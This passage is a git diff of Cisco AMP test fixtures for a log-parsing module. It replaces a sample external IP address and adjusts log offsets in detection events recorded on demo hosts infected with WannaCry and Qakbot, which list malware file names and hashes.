"7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", 
@@ -1992,7 +1992,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2008,7 +2008,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2048,7 +2048,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 43279, + "log.offset": 43444, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "db349b97c37d22f5ea1d1841e3c89eb4", @@ -2059,7 +2059,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2075,7 +2075,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2113,7 +2113,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 44631, + "log.offset": 44801, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "db349b97c37d22f5ea1d1841e3c89eb4", @@ -2124,7 +2124,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2140,7 +2140,7 @@ "@timestamp": "2021-01-14T13:43:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2172,7 +2172,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 45976, + "log.offset": 46151, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2181,7 +2181,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2193,7 +2193,7 @@ "@timestamp": "2021-01-14T13:43:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2225,7 +2225,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 47096, + "log.offset": 47276, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2234,7 +2234,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2246,7 +2246,7 @@ "@timestamp": "2021-01-14T13:43:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2287,7 +2287,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 48216, + "log.offset": 48401, "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", @@ -2303,7 +2303,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -2319,7 +2319,7 @@ "@timestamp": "2021-01-14T13:29:36.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2352,7 +2352,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 49823, + "log.offset": 50013, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2361,7 +2361,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2373,7 +2373,7 @@ "@timestamp": "2021-01-14T13:28:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2399,13 +2399,13 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 51019, + "log.offset": 51214, "related.hosts": [ "Demo_Qakbot_3" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2417,7 +2417,7 @@ "@timestamp": "2021-01-14T13:06:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2451,7 +2451,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 51942, + "log.offset": 52142, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -2460,7 +2460,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2472,7 +2472,7 @@ "@timestamp": "2021-01-14T13:06:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2510,7 +2510,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 53134, + "log.offset": 53339, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2519,7 +2519,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2535,7 +2535,7 @@ "@timestamp": "2021-01-14T13:06:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2573,7 +2573,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 54407, + "log.offset": 54617, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2582,7 +2582,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2598,7 +2598,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2632,7 +2632,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 55679, + "log.offset": 55894, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2641,7 +2641,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2653,7 +2653,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2687,7 +2687,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 56872, + "log.offset": 57092, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2696,7 +2696,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2708,7 +2708,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2742,7 +2742,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 58065, + "log.offset": 58290, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2751,7 +2751,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -2763,7 +2763,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2797,7 +2797,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 59258, + "log.offset": 59488, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2806,7 +2806,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2818,7 +2818,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2852,7 +2852,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 60451, + "log.offset": 60686, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2861,7 +2861,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2873,7 +2873,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2914,7 +2914,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 61637, + "log.offset": 61877, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 4688, @@ -2928,7 +2928,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2944,7 +2944,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2982,7 +2982,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 63166, + "log.offset": 63411, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2991,7 +2991,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3007,7 +3007,7 @@ "@timestamp": "2021-01-14T13:06:18.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3039,7 +3039,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 64439, + "log.offset": 64689, "related.hash": [ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], @@ -3048,7 +3048,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -3060,7 +3060,7 @@ "@timestamp": "2021-01-14T13:06:17.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3094,7 +3094,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 65559, + "log.offset": 65814, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -3103,7 +3103,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log index 9842f3cbe934..d4c5689972c5 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log 
@@ -1,49 +1,49 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud 